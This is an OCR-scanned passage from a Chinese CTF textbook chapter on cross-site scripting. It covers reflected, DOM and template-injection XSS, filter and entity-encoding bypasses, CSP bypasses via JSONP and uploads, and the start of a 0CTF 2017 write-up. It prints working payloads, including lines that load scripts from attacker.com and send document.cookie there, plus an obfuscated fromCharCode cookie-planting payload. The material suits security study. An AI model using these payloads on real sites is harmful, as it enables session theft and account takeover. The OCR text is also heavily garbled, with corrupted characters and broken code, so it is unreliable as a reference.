作 ) 、 私 密 网 页 内 容 、 会 话 和 Cookie 等 内 容 。 (摘自 维基 百科 ) 


如 上 所 述 ，XSssS 攻 击 是 代码 注入 的 一 种 。 时 至 今日 ， 浏 览 器 上 的 攻 与 防 片刻 未 软 ， 很多 网 从 关键 

增加 了 HTTP Only 属 性 ， 这 意味 着 执行 JavaScript 已 无 法 获得 用 户 的 登录 凭证 ( 即 无 法 通过 XSS 
攻击 窃取 Cookie 登 录 对 方 账号 ) ， 虽 然 同 源 策略 限制 了 JavaScript 跨 域 执 行 的 能 力 ， 但 是 XSS 攻 击 依 
然 可 以 理解 为 在 用 户 浏览 器 上 的 代码 执行 漏洞 ， 可 以 在 悄 无 声息 的 情况 下 实现 模拟 用 户 的 操作 (包括 
文件 上 传 等 请 求 ) 。cCTF 比 赛 中 曾 数 次 出 现 这 种 类 型 的 X9s 题 目 。 


2.3.1 XSS 汤 ; 间 类 型 
1. 反射 /存储 型 XSS 


根据 XSS 漏 洞 点 的 触发 特征 ，XSS 可 以 粗略 分 为 反射 型 XSS、 存 储 型 XSS。 反 射 型 XSS 通 常 是 指 恶 意 代 
码 未 被 服务 器 人 存储， 每 次 触发 漏洞 的 时 候 都 将 恶意 代码 通过 GET/VPOST 方 式 提交 ， 然 后 触发 漏洞 。 存 
储 型 XSs 则 相反 ， 有 恶意 代码 被 服务 器 存储 ， 在 访问 页 面 时 会 直接 被 触 友 (如 留言 板 留言 等 场景 ) 。 


这 里 模拟 一 个 简单 的 反射 型 XSS ( 见 图 2-3-1) ,变量 输入 点 没有 任何 过 滤 直 接 在 HTML 内 容 中 输出 ， 
束 像 攻击 者 对 HTML 内 容 进行 了 “注入 ”， 这 也 是 XSS 也 称 为 HTML 注 入 的 原因 ， 这 样 我 们 可 以 向 网 
页 中 注入 恶意 的 标签 和 和 代码， 实现 我 们 的 功能 ， 见 图 2-3-2.。 


然而 这 样 的 payload 会 被 Google Chrome 等 浏览 器 直接 拦截 ， 无 法 触发 ， 因 为 这 样 的 请 求 ( 即 GET 参 
数 中 的 JavaScript 标 签 代码 直接 打印 在 HTML 中 ) 符合 Google Chrome 浏 览 器 XSS 过 滤器 (XSS A 

) 的 规则 ， 所 以 被 直接 拦截 (这 也 是 近年 来 Google Chrome 加 强 防 护 策略 导致 的 。 在 很 长 一 段 时 
间 内 ， 攻 击 者 可 以 肆意 地 在 页 面 中 注入 X93 有 恶意 代码 ) 。 换 用 FireFox 浏 览 器 ， 结 果 见 图 2-3-3。 


(©) hello x © view-source:127.0.0.1:8888/xs Xx 


€ > CGC © view-source:127.0.0.1:8888/xss/1.php?name={ 输 入 点 } 


<1DOCTYPE html> 
<html> 
<head> 
<title>hello</title> 
</head> 
<body> 
<hl> hello {输入 点 }</h1l1> 
</body> 
</html> 


个 | 三 
书城 目录 
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€ > GC © view-source:127.0.0.1:8888/xss/1.php?name=<script>alert("hello%20xss")</script: 


<!DOCTYPE html> 
<html> 


图 2-3-3 
输入 的 数据 被 拼接 到 HTML 内 容 中 时 ， 有 时 被 输出 到 一 些 特殊 的 位 置 ， 如 标签 属性 、JavaScript 变 量 
的 值 ， 此 时 通过 闭合 标签 或 者 语句 可 以 实现 payload 的 逃逸 。 


又 如 ， 下 面 的 输入 被 输出 到 了 标签 属性 的 值 中 ( 见 图 2-3-4) ， 通 过 在 标签 属性 中 注入 on 事件 ， 我 们 
可 以 执行 恶意 代码 ， 见 图 2-3-5。 在 这 两 种 情况 下 ， 由 于 特征 比较 明显 ， 因 此 使 用 Google Chrome 浏 
览 器 的 时 候 会 被 Google Chrome XSS Auditor 拦 截 。 


第 三 种 情况 是 我 们 的 输入 被 输出 到 JavaScript 变 量 中 ( 见 图 2-3-6) ， 这 时 可 以 构造 输入 ， 闭 合 前 面 的 
双 引 号 ， 同 时 引入 恶意 代码 ( 见 图 2-3-7) 。 





© view-source:127.0.0.1:8888/xs Xx 


€ > CGC © view-source:127.0.0.1:8888/xss/2.php?name=text233"%20autofocus%20onfocus="alert(1 


[<!DOCTYPE html> 
<html> 


127.0.0.1.8888/xss/2.phpiname=text233"%20autofocus20oniocus="alertll) 


<?php 
$name = $ GET['name'];: 


html> 


>heLLo</ 


目录 
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document ,write("hello ".username): 


© view-source:127.0.0.1:8888/xs x “十 


€ > CGC © view-source:127.0.0.1:8888/xss/3.php?name=aaa"%2balert(1);// 


1| <!DOCTYPE html> 


<script type="text/javascript"> 
Var username = "aaa"+talert(1);//"; 
document .write("hello ".username); 
</script> 


图 2-3-7 
可 以 看 到 ， 这 次 页 面 源码 并 没有 变 红 ， 意 味 着 Google Chrome 并 未 拦截 这 个 输入 ， 访 问 成 功 弹 框 ， 
见 图 2-3-8。 


。 hello x + 
€ > x © 127.0.0.1:8888/xss/3.php?name=aaa"%2balert(1);// 


127.0.0.1:8888 显示 
1 


图 2-3-8 
前 三 种 是 XSS 中 最 简单 的 场景 ， 即 输入 原封 不 动 地 被 输出 在 页 面 中 ， 通 过 精心 构造 的 输入 ， 使 得 输入 
中 的 恶意 数据 混入 Javascript 代 码 中 得 以 执行 ， 这 也 是 很 多 漏洞 的 根源 所 在 ， 即 : 没有 很 好 地 区 分 开 
代码 和 数据 ， 导 致 攻击 者 可 以 利用 系统 的 缺陷 ， 构 造 输入 ， 进 而 在 系统 上 执行 任意 代码 。 


2. DOM XSS 


简单 来 讲 ，DOM XSS 是 页 面 中 原 有 的 JavaScript 代 码 执行 后 ， 需 要 进行 DOM 树 节点 的 增加 或 者 元 素 
的 修改 ， 引 入 了 被 污染 的 变量 ， 从 而 导致 XSS， 见 图 2-3-9。 其 功能 是 获取 imgurl 参 数 中 的 图 片 链 


接 ， 然 后 拼接 出 一 个 图 片 标签 并 显示 到 网 页 中 ， 见 图 2-3-10。 


>1mage display</ 


| ) 
DLL 
IOow, LoCat li1on. search, 
| 


lela rlParaml( 
imagehtml 


(imagehtml); 


© image display x 让 
€ > CC © 127.0.0.1:8888/xss/4.php?imgurl=https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png 
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可 以 看 到 ， 有 恶意 代码 最 终 被 拼接 到 了 img 标 笠 中 并 害 执 行 。 
3. 其 他 场景 


决定 上 传 的 文件 能 人 否 被 浏览 器 解析 成 HTML 代 码 的 关键 是 HTTP 响 应 头 中 的 元 素 Content-Type， 所 以 

无 论 上 传 的 文件 是 以 什么 样 的 后 缀 被 保存 在 服务 器 上 ， 只 要 访问 上 传 的 文件 时 返回 的 Content-type 是 

text/html， 就 可 以 成 功 地 被 浏览 器 解析 并 执行 。 类 似 地 ， Flash 文 件 的 application/x-shockwave- 
也 可 以 被 执行 XSS。 


a 


事实 上 ， 浏 览 器 会 默认 把 请 求 响应 当 作 HTML 内 容 解析 ， 如 空 的 和 了 畸形 的 Content-type， 由 于 浏览 器 
之 间 存 在 差异 ， 因 此 在 实际 环境 中 要 多 测试 。 比 如 ，Google Chrome 中 的 空 Content-type 会 被 认为 
是 text/html， 见 图 2-3-12， 也 是 可 以 弹 框 的 ， 见 图 2-3-13。 


<!DOCTYPE html> 
时 <html> 
j> <head> 
Vv 
<script typoe™” toxt 3 > 
<img srce"https://ww.google.com/images/branding/googlelogo/2x/googlelogo color 272x92dp.png™ onloade "alert(1)"> 
</body> 
</html> 


图 2-3-11 
v Response Headers view source 


Connection: Keep-ALive 

Content-Length: 41 

Content-Type: 

Date: Thu, 30 May 2019 0@7:22:33 GMT 
D-Alive: timeout=5, max=100 


图 2-3-12 


图 2-3-13 


pie DR de 
1. 可 以 用 来 执行 XSS 的 标签 


基本 上 所 有 的 标签 都 可 以 使 用 on 事件 来 触 友 恶意 代码 ， 比 如 : 
效果 见 图 2-3-14。 


© 
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图 2-3-14 


另 一 个 比较 单 用 的 是 img 标 签 ， 效 果 见 图 2-3-12。 


<img src=x onerror="alert('error')" /> 


由 于 页 面 不 存在 路 径 为 /x 的 图 片 ， 因 此 直接 会 


图 2-3-15 
其 他 弟 见 的 标 位 如 下 : 


<script src="http://attacker.com/a.js"></script> 
<script>alert(1)</script> 

<Link rel="import" href="http://attacker.com/1.html"> 
<iframe src="javascript:alert(1)"></iframe> 

<a href="javascript:alert(1)">click</a> 
<svg/onload=alert(1)> 


2. HTML5 特 性 的 XSS 


HTML5 的 某 些 特性 可 以 参考 网 站 http://html5sec.org/。 很 多 标签 的 on 时 间 触 友 是 需要 交互 的 ， 如 妃 
标 交 过 点 击 ， 代 码 如 下 : 


input 标 签 的 autofocus 属 性 会 自动 使 光标 聚焦 于 此 ， 不 需 交 互 就 可 以 触发 onfocus 事 件 。 两 个 input 
元 素 竞争 焦 上 筷 ， 当 焦点 到 另 一 个 input 元 素 时 ， 前 面 的 会 触 友 blur 事 件 。 例 如 : 


<input onblur=write(1) autofocus><input autofocus> 


3. 伪 协 议 与 XSs 


通常 ， 我 们 在 浏览 器 中 使 用 HTTP/HTTPS 协 议 来 访问 网 站 ,但 是 在 一 个 页 面 中 ， 妃 标 悬 停 在 一 个 超 链 
接 上 时 ， 我 们 总 会 看 到 这 样 的 链接 : javascript: void (0) 。 这 其 实 是 用 Javascript 伪 协议 实现 
的 。 如 果 手 动 单 击 ,或 者 页 面 中 的 JavaScript 执 行 跳 转 到 JavaScript 伪 协议 时 ， 浏 览 器 并 不 会 带领 我 
们 去 访问 这 个 地 址 ， 而 是 把 "javascript: ”后 的 那 一 段 内 容 当 作 JavaScript 代 码 ， 和 直接 在 当前 页 面 
执行 。 所 以 ， 对 于 这 样 的 标签 : 


<a href="javascript:alert(1)">click</a> 


单 击 这 个 标签 时 并 不 会 跳 转 到 其 他 网 页 ， 而 是 直接 在 当前 页 面 执行 alert (1) ， 除 了 直接 用 a 标 签单 
击 触 友 ，JavaScript 协 议 触 友 的 万 式 还 有 很 多 。 


比如 ， 利 用 JavaScript 进 行 页 面 跳 转 时 ， 跳 转 的 协议 使 用 JavaScript 伪 协议 也 能 进行 触 友 ， 代 码 如 
下 : 


<script type="text/javascript"> 
location.href="javascript:alert(document .domain)"; 
</script> 


所 以 如 果 在 一 些 登 录 / 退 出 业务 中 存在 这 样 的 代码 : 


<!DOCTYPE htmL> 


<head> 
<titLe>Logout</titLe> 
</head> 


<body> 
<script type="text/javascript"> 
function getUrlPparam(name) { 
= new RegExp("(*|8&)" + name + "=([^&]*)(8&|$)"); 


if (r != null) 


return decodeURI(r[2]); 
return null; 
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即 跳 转 的 地 址 是 我 们 可 控 的 ， 我 们 融 能 控制 跳 转 的 地 址 到 Javascript 伪 协议 ， 从 而 实现 XSS 攻 击 ， 见 
图 2-3-16。 


© 127.0.0.1:8888/xss/logout.html?jumpurl=javascript:alert(0) 


127.0.0.1:8888 显示 
0 


图 2-3-16 
另外 ，iframe 标 签 和 form 标 签 也 支持 JavaScript 伪 协议 ， 感 兴趣 的 读者 可 以 目 行 尝试 如 下 。 不 同 的 
是 ，iframe 标 签 不 需 人 交互 即 可 触 友 ， 而 form 标 签 需要 在 提交 表单 时 才 会 触 友 。 


<iframe src="javascript:alert(1)"></iframe> 
<f tion="javascript:alert(1)"></form> 


除了 JavaScript 伪 协议 ， 还 有 其 他 伪 协 议 可 以 在 iframe 标 签 中 实现 类 似 的 效果 。 比 如 ，data 伪 协议 : 


<iframe src = "data:text/htmLibase64,PHNjcmLwdD5hbGVydCgieHNzIik8L3NjcmLwdD4="></iframe> 


4. 二 次 泻 染 导致 的 XSS 


后 端 语言 如 flask 的 jinja2 使 用 不 当时 ， 可 能 存在 模板 注入 ， 在 前 尊 也 可 能 因为 这 样 的 原因 形成 XSS。 
例如 ， 在 AngularJS 中 : 


<?php 
$tempLate = "Hello {{name}}".$_GET['t']; 
?> 
<!DOCTYPE html> 
<htmL> 
<head> 
<meta charset="utf-8"> 
<script src="https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js"></script> 
</head> 
<body> 
<div ng-app=""> 
<p> 名 字 : <input type="text" ng-model="name"></p> 
<h1><?=$template?></h1> 
er 


</body> 
</html> 


上 面 的 代码 会 将 参数 t 直 接 输 出 到 AngularJS 的 模板 中 ， 在 我 们 访问 页 面 时 ，JavaScript 会 解析 模板 中 
的 代码 ， 可 以 得 到 一 个 前 端的 模板 注入 。AngularJS 引 警 解析 了 表达 式 “3*3” 并 打印 了 结果 ， 见 图 2 
-3-17。 


图 2-3-17 
箱 逃 逸 ， 我 们 便 能 达到 执行 任意 JavaScript 代 码 的 目的 。 这 样 的 XSS 是 因为 前 端 对 某 部 分 输出 


© 127.0.0.1:8888/xss/6.php?t={{%27a%27.constructor.prototype.charAt=[].join; $eval(%27x=1}%20}%20};alert(1)//%27);}} 


127.0.0.1:8888 显示 
1 


图 2-3-18 
参考 链接 : https://portswigger.net/blog/XSS-without-html-client-side-template- | 
i injection 
全 
书城 目录 
https://weread.qq.com/web/reader/77d32500721a485577d8eeekc7432af0210c74d97b01b1c 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读书 


2.3.3 XSS 过 滤 和 绕 


过 滤 的 两 个 层 为 WAF 层 、 代 码 层 。WAF (Web Application Firewall，Web 应 用 防火 墙 ) 层 通 常 在 
代码 外 ， 主 机 层 对 HTTP 应 用 请 求 一 个 过 滤 拦 截 器 。 代 码 层 则 在 代码 中 直接 实现 对 用 户 输 入 的 过 滤 或 
者 引用 第 三 方 代码 对 用 户 输入 进行 过 滤 。 


Javascript 非 党 灵活 ， 所 以 对 于 普通 的 正则 匹配 ， 字 符 串 对 比 很 难 拦截 XSs 漏 洞 。 过 滤 的 时 候 一 般 会 
面临 多 种 场景 。 


1. 富 文 本 过 滤 


对 于 发 送 邮 件 和 写 博客 的 场景 ， 标 签 是 必 不 可 少 的 ， 如 藤 入 超 链 接 、 图 片 需要 HTML 标 签 ， 如 果 对 标 
签 进行 黑 名 单 过 滤 ， 必 然 出 现 遗 漏 的 情况 ， 那 么 我 们 可 以 通过 寻找 没有 被 过 滤 的 标签 进行 绕 过 。 


我 们 也 可 以 党 试 fuzz 过 滤 有 没有 缺陷 ， 如 在 直接 把 script 蔡 换 为 空 的 过 滤 方 式 中 ， 可 以 采用 双 写 形式 
<Scrscriptipt> ; 或 者 在 没有 考虑 大 小 写 时 ， 可 以 通过 大 小 写 的 变换 绕 过 script 标 签 ， 见 图 2-3-19。 


<?php 
function filter($payload) { 
$data = str_replace("script", "", $payload); 
return $data; 
1 
$name = filter($_GET["name"]); 
echo "hello $name"; 


《和 2 CGC © view-source:127.0.0.1:8888/xss/7.php?name=<scscriptript>alert(1)</scripscriptt> 


访 2 3 19 
首 误 的 过 滤 方 式 甚至 可 以 帮助 我 们 绕 过 浏览 器 的 XSS 过 滤器 。 


2. 输出 在 标签 属性 中 


二 = SU DE 
onmousemove 等 。 当 语句 被 输出 到 标签 事件 的 位 置 时 ， 我 们 可 以 通过 对 payload 进 行 HTML 编 码 来 
绕 过 检测 ， 见 图 2-3-20。 


: alert(1) 


&#X61;&#X6ci&#X65;&#X72;&#X74;&#X28i&#Xx31;&#x29| 


图 2-3-20 
利用 burpsuite 对 payload 进 行 实体 编码 : 


error="&#x61; &#x6c; &H#x65; &H#XxT72; SH#xT74; &#x28; &#x31;&H#x29;" /> 
打开 浏览 器 即 可 触 友 ， 见 图 2-3-21。 


127.0.0.1:8888/xss/4.html 


127.0.0.1:8888 显示 
1 


图 2-3-21 


能 触发 与 浏览 器 演 染 页 面 的 顺序 有 关 。 我 们 的 payload 在 标签 属性 中 ， 触 发 事件 前 ， 浏 览 
es 次 解码 ， 即 从 实体 编码 转换 成 了 常规 数据 。 


如 果 对 Javascript 的 国 数 进行 过 滤 ， 如 过 滤 了 “eval (” 这 样 的 字符 组 合 ， 那 么 可 以 通过 下 面 的 方式 
进行 绕 过 : 
个 | 
书城 Eb 
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正 因 为 JavaScript 非 常 灵 活 ， 所 以 通过 黑 名 单 的 方式 对 XSS 攻 击 进行 过 滤 是 很 困难 的 。 


3. 输出 在 Javascript 变 量 中 


通过 闭合 Javascript 语 句 ， 会 使 得 我 们 的 攻击 语句 逃逸 ， 这 时 有 经 验 的 开 友 可 能 会 对 引号 进行 编码 或 
者 转 义 ， 进 而 防御 XSS， 但 是 配合 一 些 特殊 的 场景 依然 可 能 形成 XSS。 例 如 ， 对 于 如 下 双 输 入 的 注 
pee 


如 果 只 过 滤 单 引号 而 没 考虑 人 ”， 那 么 我 们 可 以 转 勾 语句 中 的 第 二 个 单 引号 ， 使 得 第 一 个 单 引号 和 第 
三 个 单 引号 闭合 ， 从 而 让 攻击 语句 逃逸 : 


SELECT * FROM users WHERE name = '\' and pass = 'union select xxxxx#' 


在 XSS 中 也 有 类 似 的 场景 。 例 如 ， 如 下 代码 : 


<?php 
$name = $_GET['name']; 
$name = htmlentities($name,ENT_QUOTES), 
$address = $_GET['addr']; 
$address = htmlentities($address,ENT_QUOTES);, 
?> 
<1DOCTYPE html> 
<html> 
<head> 
<meta charset="gb18030"> 
<title></title> 
</head> 
<body> 
<script type="text/javascript"> 
var url = 'http://null.com/?name=<?=$name?>'+'<?=$address?>',; 
</script> 
</body> 
</html> 


输入 点 和 输出 点 都 有 两 个 ， 如 果 输 入 引号 ,会 被 编码 成 HTML 实 体 字符 ,但 是 htmlentities 消 数 并 不 
会 过 滤 人 ， 所 以 我 们 可 以 通过 人 ”使 得 攻击 语句 逃逸 ， 见 图 2-3-22。 


> GC © view-source:127.0.0.1:8888/xss/8.php?name=name\&addr=;alert(1);// 


<meta charset="gb18030"> 
<title></title> 
</head> 


图 2-3-22 
在 name 处 末尾 输入 人 ， 在 addr 参 数 处 闭合 前 面 的 Javascript 语 句 ， 同 时 插入 恶意 代码 。 进 一 步 可 
以 用 eval (window.name) 引入 恶意 代码 或 者 使 用 JavaScript 中 的 String.fromCharCode 来 避免 使 


用 3 引号 等 被 过 渡 的 字符 。 


再 介绍 几 个 小 近 巧 ， 见 图 2-3-23， 将 payload 臣 企 location.hash 中 ， 则 URL 中 “# ”后 的 字符 不 会 被 
发 到 服务 器 ， 所 以 不 存在 被 服务 器 过 滤 的 情况 ， 见 图 2-3-24。 


127.0.0.1:8888/xss/8.php?name=aaa\&addr=;eval(unescape(location.hash. slice(1)));/ /#alert('payload%20hide%20in%20hash'); 


127.0.0.1:8888 显示 


payload hide in hash 


2-3-23 
@ 127.0.0.1:8888/xss/8.php?name=aaa\&addr=;alert( ` 反 引号 也 是 可 以 用 来 作为 边界 符 的 哟 `);// 


127.0.0.1:8888 显示 
反 引 号 也 是 可 以 用 来 作为 边界 符 的 哟 


© 
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在 JavaScript 中 ， 反 引号 可 以 直接 当 作 字符 串 的 边界 符 。 


4. CSP 过 滤 及 其 绕 过 
我 们 引用 https://developer.mozilla.org/zh -CN/docs/Web/VHTTP/VCSP 的 内 容 来 介绍 CSP。 


CSP (Content Security Policy， 内 容 安全 策略 ) 是 一 个 额外 的 安全 层 ， 用 于 检测 并 削弱 某 些 特定 类 
型 的 攻击 ,包括 跨 站 脚本 (XSS) 和 数据 注入 攻击 等 。 无 论 是 数据 次 取 、 网 站 内 容 污染 还 是 散 友 恶意 
软件 ， 这 些 攻击 都 是 主要 的 手段 。 


CSP 被 设计 成 完全 向 后 兼容 。 不 支持 CSP 的 浏览 器 也 能 与 实现 了 CSP 的 服务 器 正常 合作 ， 反 之 亦 然 : 

不 文 持 CSP 的 浏览 器 只 会 忽略 它 ， 正 常 运行 ， 默 认 网 页 内 容 使 用 标准 的 同 源 策略 。 和 如果 网 站 不 提供 

头 部 ， 那 么 浏览 器 也 使 用 标准 的 同 源 策 略 。 

为 了 使 CSP 可 用 ， 我 们 需要 配置 网 络 服务 器 返回 Content-Security-Policy HTTP 头 部 ala 

ontent 

-Security-Policy 头 部 的 提 法 ， 那 是 旧版 本 ， 不 需 如 此 指定 它 ) 。 除 此 之 外 ，<meta > 元 素 也 可 

以 被 用 来 配置 该 策略 。 

从 前 面 的 一 些 过 滤 绕 过 也 可 以 看 出 ，XSs 的 防御 绝 非 易 事 ，CSP 应 运 而 生 。CSP 策 略 可 以 看 作为 了 防 


御 XSS， 额 外 添加 的 一 些 浏览 器 泻 染 页 面 、 执 行 JavaScript 的 规则 。 这 个 规则 是 在 浏览 器 层 执行 的 ， 
只 需 配 置 服务 器 返回 Content-Security-Policy 头 。 例 如 : 


<?php 
本 rity-Policy: script-src x .baidu.com' 


这 段 代码 会 规定 ， 这 个 页 面 引 用 的 Javascript 文 件 只 允许 来 自 百度 的 子 域 ， 其 他 任何 万 式 的 < 
执行 都 会 被 拦截 ， 包 括 页 面 中 本 身 的 script 标 签 内 的 代码 。 如 果 引 用 了 不 5 < 可 信 域 的 Javascript 文 件 ， 


Script 


则 在 浏览 器 的 控制 侣 界面 ( 按 F12， 打 开 console) 会 报错 ， 见 图 2-3-25。 


© We bs 有 a ad the script 
og 区 tc dir ee 
ns ript~: 


图 2-3-25 


CSP 规 则 见 表 2-3-1。 


定义 资源 的 默认 加 载 策略 

定义 Ajax、WebSocket 等 加 载 策略 
定义 Font 加 载 策略 

定义 Frame 加 载 策略 

定义 图 片 加 载 策略 

定义 <audio><vedio> 等 引用 资源 的 加 载 策略 
定义 <applet><embed><object> 等 引用 资源 的 加 载 策略 
定义 JS 加 载 策略 

定义 CSS 加 载 策 略 

若 值 为 allow-forms， 则 对 资源 启用 sandbox 
若 值 为 /report-uri， 则 提交 日 志 


表 中 的 每 个 规则 都 对 应 了 浏览 器 中 的 某 部 分 请 求 ， 如 default-src 指 令 定 义 了 那些 没有 被 更 精确 指令 指 
定 的 安全 策略 ， 可 以 理解 为 页 面 中 所 有 请 求 的 一 个 默认 策略 ; Se ea 
avaScri 
资源 文件 的 源 。 其 余 规则 的 含义 读者 可 以 自行 学 习 ， 不 再 韭 述 。 


在 CSP 规 则 的 设置 中 ，“*” 可 以 作为 通配符 。 例 如 ，“*.baidu.com” 指 的 是 允许 加 载 百 度 所 有 子 域 
名 的 JavaScript 人 资源 文件; 还 支持 指定 具体 协议 和 路 径 ,如 “Content-Security-Policy: script-src 
tt 
://*.baidu.com/js/” 指 定 了 县 体 的 协议 以 及 路 径 。 


除 此 之 外 ，script-src 还 支持 指定 关键 词 ， 常 见 的 关键 词 如 下 。 


XeTelel -HE Ea = 
On 
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学 Self: 允许 加 载 同 源 的 资源 文件 。 
必 Unsafe-inline: 人 允许 在 页 面 内 直接 执行 诅 入 的 JavaSscript 人 代码。 


学 unsafe-eval: 人 允许 使 用 eval() 等 通过 字符 串 创 建 代码 的 方法 。 


所 有 关键 词 都 需要 用 单 引 号 包 器 。 如 果 在 某 条 CSP 规 则 中 有 多 个 值 ， 则 用 空格 隔 开 ; 如 果 有 多 条 指 
令 ， 则 用 “; ” 隔 开 。 比 如 : 


Content-Security-Policy: defauLt-src 'self';scri STC 'self' *.baidu.com 


5. 常见 的 场景 及 其 绕 


CSP 规 则 众多 ， 所 以 这 里 只 简单 举例 ， 其 他 相关 规则 及 绕 过 方式 读者 可 以 自行 查阅 相关 资料 。 例 如 
对 于 “script-sre'self” ，self 对 应 的 CSP 规 则 允许 加 载 本 地 的 文件 ， 我 们 可 以 通过 这 个 站 点 上 可 控 
的 链接 写 入 恶意 内 容 ， 如 文件 上 传 、JSONP 接 口 。 例 如 | 


<?php 
header("Content-Security-Policy: script-src 'self'"); 
$jsurl = $_GET['url']; 
$jsurl = addslashes($jsurl); 
?> 
<!DOCTYPE html> 
<html> 
<head> 
<title>bypass csp</title> 
</head> 


<body> 
pe type="text/javascript" src="<?=$jsurl?>"></script> 


AE lM lle /le PAE Us 
浏览 器 拒绝 执行 。 


假设 上 传 了 一 个 a.xxxxx 文 件 ， 通 过 URL 的 GET 参 数 ， 把 这 个 文件 引入 script 标 签 的 src 属 性 ， 此 时 返回 
的 Content-type 为 text/plain， 解 析 结 果 见 图 2-3-26。 


127.0.0.1:8888/xss/csp.php?url=upload/a.xxxxx 


127.0.0.1:8888 显示 
csp bypass 


: 
图 2-3-26 

除 此 之 外 ， 我 们 可 以 利用 JSONP 命 令 进 行 绕 过 。 假 设 存 在 JSONP 接 口 ( 见 图 2-3-27) ， 我 们 可 以 通 

过 JSONP 接 口 引 入 符合 Javascript 语 法 的 代码 ， 见 图 2-3-28。 


€ > CC © 127.0.0.1:8888/xss/jsonp.php?callback=callback 


'status':'success' 


图 2-3-28 
苟 该 JSONP 接 口 处 于 日 名 单 域 下 ， 可 以 通过 更 改 callback 参 数 向 页 面 中 注入 近 意 代码 ， 在 触 友 后 
引入 构造 好 的 链接 ， 见 图 2-3-29。 


27.0.0.1:8888/xss/csp.php?url=jsonp.php%3fcallback=alert(“bypass%20csp!);// 


127.0.0.1:8888 显示 
bypass csp! 


图 2 S29 
见 的 绕 过 万 法 如 下 : 


<Link rel="prefetch" href="http://baidu.com"> H5 预 加 栽 , 仅 GoogLe Chrome 支持 
<Link rel="dns-prefetch" href="http://baidu.com"> DNS 预 加 载 
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还 有 就 是 利用 页 面 跳 转 ， 包 括 a 标 签 的 跳 转 、location 变 量 赋值 的 跳 转 ，meta 标 签 的 跳 转 等 手法 。 比 
如 ， 通 过 跳 转 实现 市 出 数据 : 


Location.href="http://attacker.com/?c="+escape(document .cookie 


2.3.4 XS9S 红 过 案例 

CTF 中 的 XSS 题 目 通 党 利用 XSS bot 从 后 台 模 拟 用 尸 访 问 链接 ， 进 而 触 友 答题 者 构造 的 XSS， 读 到 出 题 
者 隐 蕊 在 bot 浏 哆 器 中 的 flag。flag 通 常 在 bot 浏 览 器 的 Cookie 中 ， 或 者 存在 于 只 有 lbot 的 身份 才 可 以 
Da ES Si = SM ub CSN A 
目 己 曾 经 挖 到 的 XSs 漏 洞 案 例 。 


1. OCTF 2017 Complicated Xss 


题目 中 人 存在 两 个 域名 governmentvip 和 admin.government.vip， 见 图 2-3-30。 


XSS Book 


The flag is n http://admin.govenment.vip:8000 
Bruteforce and scanning are not Needed! 
Admin will be hit by your paytoad 


Try to fnd a string Ssir so that (substr(mdS5'Sst’), 0, 6) === '3db45b1 


图 2-3-30 


题目 提示 : http://admin.government.vip: 8000。 测 试 后 发 现 ， 我 们 可 以 在 government.vip 中 
输入 任意 HTML 让 BOT 和 触发 ， 也 就 是 可 以 让 bot 在 government.vip 域 执行 任意 JavaScript 代 码 。 经 过 
进一步 探测 友 现 


<1> 需 要 以 管理 员 的 身份 向 http://admin.government.vip: 8000/upload 接 口上 传 文件 后 ， 才 能 


得 到 flag 


<2>http://admin.government.vip: 8000 中 和 存在 一 个 XSS， 用 户 Cookie 中 的 用 户 名 直接 会 被 显 
示 在 HTML 内 容 中 ， 见 图 2-3-31。 


二 © admin.governmentvyip:8000 


Hello test 


Qnly admin can upload a shell 


图 2-3-31 
<3>http://admin.government.vip: 8000/ 页 面 仔 在 过 滤 ， 删 除了 很 多 阔 数 ， 需 要 想 办 法 绕 过 才 
个 | 
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delete window.eval; 

delete window.alert; 

delete window.XMLHttpRequest; 
delete window.Proxy; 

delete window.Image; 

delete window.postMessage; 


根据 得 到 的 信息 可 以 梳理 出 思路 ， 利 用 government.vip 根 域 的 XSS， 将 对 admin 子 域 攻击 的 代码 写 入 
Cookie， 设 置 Cookie 有 效 的 域 为 所 有 子 域 (所 有 子 域 均 可 访问 此 Cookie) 。 设 置 完 Cookie 后 ，3 引 | 导 
用 户 访问 打印 Cookie 的 页 面 ， 使 bot 在 admin 子 域 触 皮 XSS9， 触 上 友 后 利用 XSSs 在 admin 子 域 中 新 建 一 
个 iframe 页 面 ， 从 而 绕 过 页 面 中 国 数 的 限制 ， 并 读 取 管理 员 上 传 页 面 的 HTML 源 码 ， 最 后 构造 上 传 包 
利用 XSs 触 上 上 传 ， 获 得 flag 后 发 送 给 攻击 者 。 


首先 ， 在 根 域 触 友 XSS 的 内 容 : 


<script> 
function setCookie(name, value, seconds) { 
seconds = seconds || 9; // seconds 有 值 就 直接 赋值 ， 没 有 为 G@， 这 个 与 php 不 一 样 
Var expires = ""; if (seconds != 9 ) { // 设置 Cookie 生存 时 间 
var date = new Date(); 
date.setTime(date.getTime()+(seconds*1000)); 
expires = "; 
expires="+date.toGMTString(); 
} 
document .cookie = name+"="+valuetexpires+"; path=/;domain=government.vip"; // 转 码 并 赋值 } 
setCookie('username','<iframe src=\'javascript:eval(String.fromCharCode(118, 
97, 114, 32, 115, 115, 115, 61, 100, 111, 99, 117, 109, 101, 1190, 116, 46, 99, 
114, 101, 97, 116, 1901, 69, 108, 181, 189, 101, 110, 116, 40, 34, 115, 99, 
114, 105, 112, 116, 34, 41, 59, 115, 115, 115, 46, 115, 114, 99, 61, 34, 104, 
LO TO dl OB UT 全 下 本 下 人 
99, 110, 47, 98, 97, 105, 100, 117, 47, 120, 115, 115, 46, 106, 115, 34, 59, 
100, 1L1 99. 117,. 169, 16861, 110. 116, 46. 980 111, 10608. 21 6 97 7 112, 
112, 101, 110, 160, 67, 104, 105, 108, 160, 490, 115, 115, 115, 41, 59))\'> 
</iframe>' ,1000); 
var ifm = document.createElement('iframe'); 
ifm.src = 'http://admin.government .vip:8000/"'; 
document .body .appendChild(ifm); 
</script> 


将 payload 设 置 到 Cookie 中 ， 然 后 引导 bot 访 问 admin 子 域 。 恶 意 代 码 的 利用 分 两 次 ， 第 一 次 是 记 
管理 员 上 传 文件 的 HTML， 读 到 的 上 传 页 面 见 图 2-3-32。 


<p>Upload your shel1(/p> 

Cform action=" /upload” method= post” enctype= ”multipartAform-data ”> 
pinput type= "file” name="file”>/p> 

pCinput type= submit” value= "upload > 

fp /form)> 


图 2-3-32 
读 到 源码 后 ， 修 改 payload 构 造 ， 利 用 Javascript 上 传 文件 的 代码 ， 并 且 在 上 传 成 功 后 ， 将 页 面 发 送 
